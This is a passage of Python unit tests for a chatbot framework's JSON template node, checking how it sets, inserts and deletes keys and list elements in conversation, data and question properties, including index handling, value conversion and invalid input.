        node.append(TemplateWordNode("value_data"))
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)
        conversation = self._client_context.bot.get_conversation(self._client_context)
        self.assertIsNotNone(conversation)
        self.assertEqual('{"key_data": "value_data"}', conversation.data_property("data_json"))

    def test_json_set_typevar(self):
        root = TemplateNode()
        self.assertIsNotNone(root)
        self.assertIsNotNone(root.children)
        self.assertEqual(len(root.children), 0)
        node = TemplateJsonNode()
        node._name = TemplateWordNode("var_json")
        node._type = "var"
        node._key = TemplateWordNode("key_var")
        self.assertIsNotNone(node)
        root.append(node)
        self.assertEqual(len(root.children), 1)
        node.append(TemplateWordNode("value_var"))
        conversation = self._client_context.bot.get_conversation(self._client_context)
        self.assertIsNotNone(conversation)
        question = Question.create_from_text(self._client_context, "Hello", self._client_context.bot.sentence_splitter)
        conversation.record_dialog(question)
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)
        self.assertIsNotNone(conversation.current_question())
        self.assertIsNotNone(conversation)
        self.assertEqual('{"key_var": "value_var"}', question.property("var_json"))

    def test_json_set_with_quote(self):
        root = TemplateNode()
        self.assertIsNotNone(root)
        self.assertIsNotNone(root.children)
        self.assertEqual(len(root.children), 0)
        node = TemplateJsonNode()
        node._name = TemplateWordNode("var_json")
        node._type = "var"
        node._key = TemplateWordNode("key_var")
        self.assertIsNotNone(node)
        root.append(node)
        self.assertEqual(len(root.children), 1)
        node.append(TemplateWordNode('"value_var"'))
        conversation = self._client_context.bot.get_conversation(self._client_context)
        self.assertIsNotNone(conversation)
        question = Question.create_from_text(self._client_context, "Hello", self._client_context.bot.sentence_splitter)
        conversation.record_dialog(question)
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)
        self.assertIsNotNone(conversation.current_question())
        self.assertIsNotNone(conversation)
        self.assertEqual('{"key_var": "value_var"}', question.property("var_json"))
    def test_json_set_short_value(self):
        root = TemplateNode()
        self.assertIsNotNone(root)
        self.assertIsNotNone(root.children)
        self.assertEqual(len(root.children), 0)
        node = TemplateJsonNode()
        node._name = TemplateWordNode("var_json")
        node._type = "var"
        node._key = TemplateWordNode("key_var")
        self.assertIsNotNone(node)
        root.append(node)
        self.assertEqual(len(root.children), 1)
        node.append(TemplateWordNode("v"))
        conversation = self._client_context.bot.get_conversation(self._client_context)
        self.assertIsNotNone(conversation)
        question = Question.create_from_text(self._client_context, "Hello", self._client_context.bot.sentence_splitter)
        conversation.record_dialog(question)
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)
        self.assertIsNotNone(conversation.current_question())
        self.assertIsNotNone(conversation)
        self.assertEqual('{"key_var": "v"}', question.property("var_json"))

    def test_json_set_empty(self):
        root = TemplateNode()
        node = TemplateJsonNode()
        node._name = TemplateWordNode("data_json")
        node._type = "data"
        node._key = TemplateWordNode("key_data")
        node.append(TemplateWordNode(""))
        root.append(node)
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("unknown", result)
        conversation = self._client_context.bot.get_conversation(self._client_context)
        self.assertIsNotNone(conversation)
        self.assertIsNone(conversation.data_property("data_json"))

    def test_json_set_empty_data(self):
        root = TemplateNode()
        node = TemplateJsonNode()
        node._name = TemplateWordNode("data_json")
        node._type = "data"
        node._key = TemplateWordNode("key_data")
        node.append(TemplateWordNode('""'))
        root.append(node)
        self.assertEqual(len(root.children), 1)
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)
        conversation = self._client_context.bot.get_conversation(self._client_context)
        self.assertIsNotNone(conversation)
        self.assertEqual('{"key_data": ""}', conversation.data_property("data_json"))

    def test_json_set_sub_dic(self):
        root = TemplateNode()
        node = TemplateJsonNode()
        node._name = TemplateWordNode("data_json.key_data")
        node._type = "data"
        node._key = TemplateWordNode("child")
        node.append(TemplateWordNode("value_data"))
        root.append(node)
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)
        conversation = self._client_context.bot.get_conversation(self._client_context)
        self.assertIsNotNone(conversation)
        self.assertEqual('{"key_data": {"child": "value_data"}}', conversation.data_property("data_json"))

    def test_json_set_value_to_dict(self):
        root = TemplateNode()
        node = TemplateJsonNode()
        node._name = TemplateWordNode("data_json.key_data.child")
        node._type = "data"
        node._key = TemplateWordNode("key")
        node.append(TemplateWordNode("value_data"))
        root.append(node)
        conversation = self._client_context.bot.get_conversation(self._client_context)
        conversation.set_data_property("data_json", '{"key_data": {"child": "data"}}')
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)
        self.assertIsNotNone(conversation)
        self.assertEqual('{"key_data": {"child": {"key": "value_data"}}}', conversation.data_property("data_json"))

    def test_json_set_sub_child(self):
        root = TemplateNode()
        node = TemplateJsonNode()
        node._name = TemplateWordNode("data_json.key_data")
        node._type = "data"
        node._key = TemplateWordNode("child2")
        node.append(TemplateWordNode("value_data"))
        root.append(node)
        conversation = self._client_context.bot.get_conversation(self._client_context)
        self.assertIsNotNone(conversation)
        conversation.set_data_property("data_json", '{"key_data": {"child1": "data"}}')
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)
        self.assertEqual('{"key_data": {"child1": "data", "child2": "value_data"}}', conversation.data_property("data_json"))
    def test_json_set_add_dic(self):
        root = TemplateNode()
        node = TemplateJsonNode()
        node._name = TemplateWordNode("data_json.key_data.child")
        node._type = "data"
        node._key = TemplateWordNode("add")
        root.append(node)
        node.append(TemplateWordNode("value_data"))
        conversation = self._client_context.bot.get_conversation(self._client_context)
        conversation.set_data_property("data_json", '{"key_data": {"child": {"data": ""}}')
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)
        self.assertIsNotNone(conversation)
        self.assertEqual('{"key_data": {"child": {"add": "value_data"}}}', conversation.data_property("data_json"))

    def test_json_set_with_index(self):
        root = TemplateNode()
        node = TemplateJsonNode()
        node._name = TemplateWordNode("name_json")
        node._type = "name"
        node._key = TemplateWordNode("key_name")
        node.append(TemplateWordNode("data"))
        root.append(node)
        conversation = self._client_context.bot.get_conversation(self._client_context)
        conversation.set_property("name_json", '{"key_name": ["list_1", "list_2", "list_3"]}')
        node._index = TemplateWordNode("0")
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)
        self.assertEqual('{"key_name": ["data", "list_2", "list_3"]}', conversation.property("name_json"))
        node._index = TemplateWordNode("1")
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)
        self.assertEqual('{"key_name": ["data", "data", "list_3"]}', conversation.property("name_json"))
        node._index = TemplateWordNode("2")
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)
        self.assertEqual('{"key_name": ["data", "data", "data"]}', conversation.property("name_json"))
        node._index = TemplateWordNode("3")
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)
        self.assertEqual('{"key_name": ["data", "data", "data"]}', conversation.property("name_json"))

    def test_json_set_with_index_from_end(self):
        root = TemplateNode()
        node = TemplateJsonNode()
        node._name = TemplateWordNode("name_json")
        node._type = "name"
        node._key = TemplateWordNode("key_name")
        node.append(TemplateWordNode("data"))
        root.append(node)
        conversation = self._client_context.bot.get_conversation(self._client_context)
        conversation.set_property("name_json", '{"key_name": ["list_1", "list_2", "list_3"]}')
        node._index = TemplateWordNode("-1")
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)
        self.assertEqual('{"key_name": ["list_1", "list_2", "data"]}', conversation.property("name_json"))
        node._index = TemplateWordNode("-2")
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)
        self.assertEqual('{"key_name": ["list_1", "data", "data"]}', conversation.property("name_json"))
        node._index = TemplateWordNode("-3")
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)
        self.assertEqual('{"key_name": ["data", "data", "data"]}', conversation.property("name_json"))
        node._index = TemplateWordNode("-4")
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)
        self.assertEqual('{"key_name": ["data", "data", "data"]}', conversation.property("name_json"))
    def test_json_set_list(self):
        root = TemplateNode()
        node = TemplateJsonNode()
        node._name = TemplateWordNode("name_json")
        node._type = "name"
        node._key = TemplateWordNode("key_name")
        node.append(TemplateWordNode('"list_1", "list_2", "list_3"'))
        root.append(node)
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)
        conversation = self._client_context.bot.get_conversation(self._client_context)
        self.assertEqual('{"key_name": ["list_1", "list_2", "list_3"]}', conversation.property("name_json"))

    def test_json_set_list_emptydata(self):
        root = TemplateNode()
        node = TemplateJsonNode()
        node._name = TemplateWordNode("name_json")
        node._type = "name"
        node._key = TemplateWordNode("key_name")
        node.append(TemplateWordNode('"", "list_2", ""'))
        root.append(node)
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)
        conversation = self._client_context.bot.get_conversation(self._client_context)
        self.assertEqual('{"key_name": ["", "list_2", ""]}', conversation.property("name_json"))

    def test_json_set_list_index(self):
        root = TemplateNode()
        node = TemplateJsonNode()
        node._name = TemplateWordNode("name_json")
        node._type = "name"
        node._key = TemplateWordNode("key_name")
        node._index = TemplateWordNode("1")
        node.append(TemplateWordNode('"data_1", "data_2", "data3"'))
        root.append(node)
        conversation = self._client_context.bot.get_conversation(self._client_context)
        conversation.set_property("name_json", '{"key_name": ["list_1", "list_2", "list_3"]}')
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)
        self.assertEqual('{"key_name": ["list_1", ["data_1", "data_2", "data3"], "list_3"]}', conversation.property("name_json"))

    def test_json_set_jsonform(self):
        root = TemplateNode()
        self.assertIsNotNone(root)
        self.assertIsNotNone(root.children)
        self.assertEqual(len(root.children), 0)
        node = TemplateJsonNode()
        node._name = TemplateWordNode("name_json")
        node._type = "name"
        node._key = TemplateWordNode("key_name")
        self.assertIsNotNone(node)
        root.append(node)
        self.assertEqual(len(root.children), 1)
        node.append(TemplateWordNode('{"key_1": "val_1", "key_2": "val_2"}'))
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)
        conversation = self._client_context.bot.get_conversation(self._client_context)
        self.assertIsNotNone(conversation)
        self.assertEqual('{"key_name": {"key_1": "val_1", "key_2": "val_2"}}', conversation.property("name_json"))

    def test_json_set_jsonform_with_index(self):
        root = TemplateNode()
        node = TemplateJsonNode()
        node._name = TemplateWordNode("name_json")
        node._type = "name"
        node._key = TemplateWordNode("key_name")
        node._index = TemplateWordNode("1")
        node.append(TemplateWordNode('{"key_1": "val_1", "key_2": "val_2"}'))
        root.append(node)
        conversation = self._client_context.bot.get_conversation(self._client_context)
        conversation.set_property("name_json", '{"key_name": ["list_1", "list_2", "list_3"]}')
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)
        self.assertIsNotNone(conversation)
        self.assertEqual('{"key_name": ["list_1", {"key_1": "val_1", "key_2": "val_2"}, "list_3"]}', conversation.property("name_json"))
    def test_json_set_convert_null(self):
        root = TemplateNode()
        node = TemplateJsonNode()
        node._name = TemplateWordNode("name_json")
        node._type = "name"
        node._key = TemplateWordNode("key_name")
        node.append(TemplateWordNode("null"))
        node._is_convert = True
        root.append(node)
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)
        conversation = self._client_context.bot.get_conversation(self._client_context)
        self.assertIsNotNone(conversation)
        self.assertEqual('{"key_name": null}', conversation.property("name_json"))

    def test_json_set_convert_true(self):
        root = TemplateNode()
        node = TemplateJsonNode()
        node._name = TemplateWordNode("name_json")
        node._type = "name"
        node._key = TemplateWordNode("key_name")
        node.append(TemplateWordNode("true"))
        node._is_convert = True
        root.append(node)
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)
        conversation = self._client_context.bot.get_conversation(self._client_context)
        self.assertIsNotNone(conversation)
        self.assertEqual('{"key_name": true}', conversation.property("name_json"))

    def test_json_set_convert_false(self):
        root = TemplateNode()
        node = TemplateJsonNode()
        node._name = TemplateWordNode("name_json")
        node._type = "name"
        node._key = TemplateWordNode("key_name")
        node.append(TemplateWordNode("false"))
        node._is_convert = True
        root.append(node)
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)
        conversation = self._client_context.bot.get_conversation(self._client_context)
        self.assertIsNotNone(conversation)
        self.assertEqual('{"key_name": false}', conversation.property("name_json"))

    def test_json_set_convert_integer(self):
        root = TemplateNode()
        node = TemplateJsonNode()
        node._name = TemplateWordNode("name_json")
        node._type = "name"
        node._key = TemplateWordNode("key_name")
        node.append(TemplateWordNode("100"))
        node._is_convert = True
        root.append(node)
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)
        conversation = self._client_context.bot.get_conversation(self._client_context)
        self.assertIsNotNone(conversation)
        self.assertEqual('{"key_name": 100}', conversation.property("name_json"))

    def test_json_set_convert_float(self):
        root = TemplateNode()
        node = TemplateJsonNode()
        node._name = TemplateWordNode("name_json")
        node._type = "name"
        node._key = TemplateWordNode("key_name")
        node.append(TemplateWordNode("0.11"))
        node._is_convert = True
        root.append(node)
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)
        conversation = self._client_context.bot.get_conversation(self._client_context)
        self.assertIsNotNone(conversation)
        self.assertEqual('{"key_name": 0.11}', conversation.property("name_json"))

    def test_json_set_convert_other(self):
        root = TemplateNode()
        node = TemplateJsonNode()
        node._name = TemplateWordNode("name_json")
        node._type = "name"
        node._key = TemplateWordNode("key_name")
        node.append(TemplateWordNode("text"))
        node._is_convert = True
        root.append(node)
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)
        conversation = self._client_context.bot.get_conversation(self._client_context)
        self.assertIsNotNone(conversation)
        self.assertEqual('{"key_name": "text"}', conversation.property("name_json"))
    def test_json_set_invalid_listform(self):
        root = TemplateNode()
        node = TemplateJsonNode()
        node._name = TemplateWordNode("data_json")
        node._type = "data"
        node._key = TemplateWordNode("key_data")
        node.append(TemplateWordNode('val_1, val_2'))
        root.append(node)
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)

    def test_json_set_invalid_listform_short(self):
        root = TemplateNode()
        node = TemplateJsonNode()
        node._name = TemplateWordNode("data_json")
        node._type = "data"
        node._key = TemplateWordNode("key_data")
        node.append(TemplateWordNode("v, a"))
        root.append(node)
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)

    def test_json_set_invalid_jsonform(self):
        root = TemplateNode()
        node = TemplateJsonNode()
        node._name = TemplateWordNode("data_json")
        node._type = "data"
        node._key = TemplateWordNode("key_data")
        node.append(TemplateWordNode('{"key_1": "val_1, "key_2": "val_2"}'))
        root.append(node)
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)

    def test_json_set_invalid_index(self):
        root = TemplateNode()
        node = TemplateJsonNode()
        node._name = TemplateWordNode("name_json")
        node._type = "name"
        node._key = TemplateWordNode("key_name")
        node.append(TemplateWordNode("value_var"))
        root.append(node)
        conversation = self._client_context.bot.get_conversation(self._client_context)
        conversation.set_property("name_json", '{"key_name": ["list_1", "list_2", "list_3"]}')
        node._index = TemplateWordNode("x")
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)
        self.assertEqual('{"key_name": ["list_1", "list_2", "list_3"]}', conversation.property("name_json"))
        node._index = TemplateWordNode("3")
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)
        self.assertEqual('{"key_name": ["list_1", "list_2", "list_3"]}', conversation.property("name_json"))
        node._index = TemplateWordNode("-4")
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)
        self.assertEqual('{"key_name": ["list_1", "list_2", "list_3"]}', conversation.property("name_json"))
    # INSERT
    def test_json_insert_first(self):
        root = TemplateNode()
        self.assertIsNotNone(root)
        self.assertIsNotNone(root.children)
        self.assertEqual(len(root.children), 0)
        node = TemplateJsonNode()
        node._name = TemplateWordNode("var_json")
        node._type = "var"
        node._function = TemplateWordNode("insert")
        node._index = TemplateWordNode("0")
        node._key = TemplateWordNode("key_var")
        self.assertIsNotNone(node)
        root.append(node)
        self.assertEqual(len(root.children), 1)
        node.append(TemplateWordNode("value_var"))
        conversation = self._client_context.bot.get_conversation(self._client_context)
        self.assertIsNotNone(conversation)
        question = Question.create_from_text(self._client_context, "Hello", self._client_context.bot.sentence_splitter)
        conversation.record_dialog(question)
        question.set_property("var_json", '{"key_var": ["list_1", "list_2"]}')
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)
        self.assertIsNotNone(conversation.current_question())
        self.assertIsNotNone(conversation)
        self.assertEqual('{"key_var": ["value_var", "list_1", "list_2"]}', question.property("var_json"))

    def test_json_insert_middle(self):
        root = TemplateNode()
        self.assertIsNotNone(root)
        self.assertIsNotNone(root.children)
        self.assertEqual(len(root.children), 0)
        node = TemplateJsonNode()
        node._name = TemplateWordNode("var_json")
        node._type = "var"
        node._function = TemplateWordNode("insert")
        node._index = TemplateWordNode("1")
        node._key = TemplateWordNode("key_var")
        self.assertIsNotNone(node)
        root.append(node)
        self.assertEqual(len(root.children), 1)
        node.append(TemplateWordNode("var_val"))
        conversation = self._client_context.bot.get_conversation(self._client_context)
        self.assertIsNotNone(conversation)
        question = Question.create_from_text(self._client_context, "Hello", self._client_context.bot.sentence_splitter)
        conversation.record_dialog(question)
        question.set_property("var_json", '{"key_var": ["list_1", "list_2"]}')
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)
        self.assertIsNotNone(conversation.current_question())
        self.assertIsNotNone(conversation)
        self.assertEqual('{"key_var": ["list_1", "var_val", "list_2"]}', question.property("var_json"))

    def test_json_insert_middle_from_end(self):
        root = TemplateNode()
        self.assertIsNotNone(root)
        self.assertIsNotNone(root.children)
        self.assertEqual(len(root.children), 0)
        node = TemplateJsonNode()
        node._name = TemplateWordNode("var_json")
        node._type = "var"
        node._function = TemplateWordNode("insert")
        node._index = TemplateWordNode("-2")
        node._key = TemplateWordNode("key_var")
        self.assertIsNotNone(node)
        root.append(node)
        self.assertEqual(len(root.children), 1)
        node.append(TemplateWordNode("var_val"))
        conversation = self._client_context.bot.get_conversation(self._client_context)
        self.assertIsNotNone(conversation)
        question = Question.create_from_text(self._client_context, "Hello", self._client_context.bot.sentence_splitter)
        conversation.record_dialog(question)
        question.set_property("var_json", '{"key_var": ["list_1", "list_2"]}')
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)
        self.assertIsNotNone(conversation.current_question())
        self.assertIsNotNone(conversation)
        self.assertEqual('{"key_var": ["list_1", "var_val", "list_2"]}', question.property("var_json"))

    def test_json_insert_last(self):
        root = TemplateNode()
        self.assertIsNotNone(root)
        self.assertIsNotNone(root.children)
        self.assertEqual(len(root.children), 0)
        node = TemplateJsonNode()
        node._name = TemplateWordNode("var_json")
        node._type = "var"
        node._function = TemplateWordNode("insert")
        node._index = TemplateWordNode("-1")
        node._key = TemplateWordNode("key_var")
        self.assertIsNotNone(node)
        root.append(node)
        self.assertEqual(len(root.children), 1)
        node.append(TemplateWordNode("value_var"))
        conversation = self._client_context.bot.get_conversation(self._client_context)
        self.assertIsNotNone(conversation)
        question = Question.create_from_text(self._client_context, "Hello", self._client_context.bot.sentence_splitter)
        conversation.record_dialog(question)
        question.set_property("var_json", '{"key_var": ["list_1", "list_2"]}')
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)
        self.assertIsNotNone(conversation.current_question())
        self.assertIsNotNone(conversation)
        self.assertEqual('{"key_var": ["list_1", "list_2", "value_var"]}', question.property("var_json"))

    def test_json_insert_new_first(self):
        root = TemplateNode()
        node = TemplateJsonNode()
        node._name = TemplateWordNode("var_json")
        node._type = "var"
        node._function = TemplateWordNode("insert")
        node._index = TemplateWordNode("0")
        node._key = TemplateWordNode("key_var")
        node.append(TemplateWordNode("value_var"))
        root.append(node)
        conversation = self._client_context.bot.get_conversation(self._client_context)
        question = Question.create_from_text(self._client_context, "Hello", self._client_context.bot.sentence_splitter)
        conversation.record_dialog(question)
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)
        self.assertIsNotNone(conversation.current_question())
        self.assertIsNotNone(conversation)
        self.assertEqual('{"key_var": ["value_var"]}', question.property("var_json"))

    def test_json_insert_new_last(self):
        root = TemplateNode()
        node = TemplateJsonNode()
        node._name = TemplateWordNode("var_json")
        node._type = "var"
        node._function = TemplateWordNode("insert")
        node._index = TemplateWordNode("-1")
        node.append(TemplateWordNode("value_var"))
        node._key = TemplateWordNode("key_var")
        root.append(node)
        conversation = self._client_context.bot.get_conversation(self._client_context)
        question = Question.create_from_text(self._client_context, "Hello", self._client_context.bot.sentence_splitter)
        conversation.record_dialog(question)
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)
        self.assertIsNotNone(conversation.current_question())
        self.assertIsNotNone(conversation)
        self.assertEqual('{"key_var": ["value_var"]}', question.property("var_json"))

    def test_json_insert_new_jsonform(self):
        root = TemplateNode()
        node = TemplateJsonNode()
        node._name = TemplateWordNode("var_json")
        node._type = "var"
        node._function = TemplateWordNode("insert")
        node._index = TemplateWordNode("-1")
        node.append(TemplateWordNode('{"key_1": "data_1"}'))
        node._key = TemplateWordNode("key_var")
        root.append(node)
        conversation = self._client_context.bot.get_conversation(self._client_context)
        question = Question.create_from_text(self._client_context, "Hello", self._client_context.bot.sentence_splitter)
        conversation.record_dialog(question)
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)
        self.assertIsNotNone(conversation.current_question())
        self.assertIsNotNone(conversation)
        self.assertEqual('{"key_var": [{"key_1": "data_1"}]}', question.property("var_json"))

    def test_json_insert_list(self):
        root = TemplateNode()
        node = TemplateJsonNode()
        node._name = TemplateWordNode("var_json")
        node._type = "var"
        node._function = TemplateWordNode("insert")
        node._index = TemplateWordNode("0")
        node._key = TemplateWordNode("key_var")
        node.append(TemplateWordNode('"data_1", "data_2"'))
        root.append(node)
        conversation = self._client_context.bot.get_conversation(self._client_context)
        question = Question.create_from_text(self._client_context, "Hello", self._client_context.bot.sentence_splitter)
        conversation.record_dialog(question)
        question.set_property("var_json", '{"key_var": ["list_1", "list_2"]}')
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)
        self.assertIsNotNone(conversation.current_question())
        self.assertIsNotNone(conversation)
        self.assertEqual('{"key_var": ["data_1", "data_2", "list_1", "list_2"]}', question.property("var_json"))

    def test_json_insert_jsonform(self):
        root = TemplateNode()
        node = TemplateJsonNode()
        node._name = TemplateWordNode("var_json")
        node._type = "var"
        node._function = TemplateWordNode("insert")
        node._index = TemplateWordNode("0")
        node._key = TemplateWordNode("key_var")
        node.append(TemplateWordNode('{"key_1": "data_1", "key_2": "data_2"}'))
        root.append(node)
        conversation = self._client_context.bot.get_conversation(self._client_context)
        question = Question.create_from_text(self._client_context, "Hello", self._client_context.bot.sentence_splitter)
        conversation.record_dialog(question)
        question.set_property("var_json", '{"key_var": ["list_1", "list_2"]}')
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)
        self.assertIsNotNone(conversation.current_question())
        self.assertIsNotNone(conversation)
        self.assertEqual('{"key_var": [{"key_1": "data_1", "key_2": "data_2"}, "list_1", "list_2"]}', question.property("var_json"))

    def test_json_insert_not_list(self):
        root = TemplateNode()
        node = TemplateJsonNode()
        node._name = TemplateWordNode("var_json")
        node._type = "var"
        node._function = TemplateWordNode("insert")
        node._index = TemplateWordNode("0")
        node._key = TemplateWordNode("key_var")
        node.append(TemplateWordNode('"data_1", "data_2"'))
        root.append(node)
        conversation = self._client_context.bot.get_conversation(self._client_context)
        question = Question.create_from_text(self._client_context, "Hello", self._client_context.bot.sentence_splitter)
        conversation.record_dialog(question)
        question.set_property("var_json", '{"key_var": "value"}')
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)
        self.assertIsNotNone(conversation.current_question())
        self.assertIsNotNone(conversation)
        self.assertEqual('{"key_var": "value"}', question.property("var_json"))

    def test_json_insert_not_index_top(self):
        root = TemplateNode()
        node = TemplateJsonNode()
        node._name = TemplateWordNode("name_json")
        node._type = "name"
        node._function = TemplateWordNode("insert")
        node._index = TemplateWordNode("1")
        node._key = TemplateWordNode("key_name2")
        node.append(TemplateWordNode('"data_1", "data_2"'))
        root.append(node)
        conversation = self._client_context.bot.get_conversation(self._client_context)
        conversation.set_property("name_json", '{"key_name": "value"}')
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)
        self.assertEqual('{"key_name": "value"}', conversation.property("name_json"))

    def test_json_insert_invalid_index(self):
        root = TemplateNode()
        node = TemplateJsonNode()
        node._name = TemplateWordNode("var_json")
        node._type = "var"
        node._function = TemplateWordNode("insert")
        node._key = TemplateWordNode("key_var")
        node.append(TemplateWordNode("var_val"))
        root.append(node)
        conversation = self._client_context.bot.get_conversation(self._client_context)
        question = Question.create_from_text(self._client_context, "Hello", self._client_context.bot.sentence_splitter)
        conversation.record_dialog(question)
        question.set_property("var_json", '{"key_var": ["list_1", "list_2"]}')
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)
        node._index = TemplateWordNode("x")
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)
        self.assertEqual('{"key_var": ["list_1", "list_2"]}', question.property("var_json"))
        node._index = TemplateWordNode("3")
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)
        self.assertEqual('{"key_var": ["list_1", "list_2"]}', question.property("var_json"))
        node._index = TemplateWordNode("-4")
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)
        self.assertEqual('{"key_var": ["list_1", "list_2"]}', question.property("var_json"))
    # DELETE
    def test_json_delete_typename(self):
        root = TemplateNode()
        self.assertIsNotNone(root)
        self.assertIsNotNone(root.children)
        self.assertEqual(len(root.children), 0)
        node = TemplateJsonNode()
        node._name = TemplateWordNode("name_json")
        node._type = "name"
        node._function = TemplateWordNode("delete")
        node._key = TemplateWordNode("key_name")
        self.assertIsNotNone(node)
        root.append(node)
        self.assertEqual(len(root.children), 1)
        conversation = self._client_context.bot.get_conversation(self._client_context)
        self.assertIsNotNone(conversation)
        conversation.set_property("name_json", '{"key_name": "value_name"}')
        self.assertEqual('{"key_name": "value_name"}', conversation.property("name_json"))
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)
        self.assertEqual("{}", conversation.property("name_json"))

    def test_json_delete_typedata(self):
        root = TemplateNode()
        self.assertIsNotNone(root)
        self.assertIsNotNone(root.children)
        self.assertEqual(len(root.children), 0)
        node = TemplateJsonNode()
        node._name = TemplateWordNode("data_json")
        node._type = "data"
        node._function = TemplateWordNode("delete")
        node._key = TemplateWordNode("key_data")
        self.assertIsNotNone(node)
        root.append(node)
        self.assertEqual(len(root.children), 1)
        conversation = self._client_context.bot.get_conversation(self._client_context)
        self.assertIsNotNone(conversation)
        conversation.set_data_property("data_json", '{"key_data": "value_data"}')
        self.assertEqual('{"key_data": "value_data"}', conversation.data_property("data_json"))
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)
        self.assertEqual("{}", conversation.data_property("data_json"))

    def test_json_delete_typevar(self):
        root = TemplateNode()
        self.assertIsNotNone(root)
        self.assertIsNotNone(root.children)
        self.assertEqual(len(root.children), 0)
        node = TemplateJsonNode()
        node._name = TemplateWordNode("var_json")
        node._type = "var"
        node._function = TemplateWordNode("delete")
        node._key = TemplateWordNode("key_var")
        self.assertIsNotNone(node)
        root.append(node)
        self.assertEqual(len(root.children), 1)
        conversation = self._client_context.bot.get_conversation(self._client_context)
        self.assertIsNotNone(conversation)
        question = Question.create_from_text(self._client_context, "Hello", self._client_context.bot.sentence_splitter)
        conversation.record_dialog(question)
        self.assertIsNotNone(conversation.current_question())
        question.set_property("var_json", '{"key_var": "value_var"}')
        self.assertEqual('{"key_var": "value_var"}', question.property("var_json"))
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)
        self.assertEqual("{}", question.property("var_json"))

    def test_json_delete_child_dic(self):
        root = TemplateNode()
        node = TemplateJsonNode()
        node._name = TemplateWordNode("data_json.key_data")
        node._type = "data"
        node._function = TemplateWordNode("delete")
        node._key = TemplateWordNode("element")
        root.append(node)
        conversation = self._client_context.bot.get_conversation(self._client_context)
        conversation.set_data_property("data_json", '{"key_data": {"element": "value_data"}}')
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)
        self.assertEqual('{"key_data": {}}', conversation.data_property("data_json"))

    def test_json_delete_list_element(self):
        root = TemplateNode()
        node = TemplateJsonNode()
        node._name = TemplateWordNode("name_json")
        node._type = "name"
        node._function = TemplateWordNode("delete")
        node._key = TemplateWordNode("key_name")
        node._index = TemplateWordNode("1")
        root.append(node)
        conversation = self._client_context.bot.get_conversation(self._client_context)
        conversation.set_property("name_json", '{"key_name": ["list_1", "list_2", "list_3"]}')
        result = root.resolve(self._client_context)
        self.assertIsNotNone(result)
        self.assertEqual("", result)
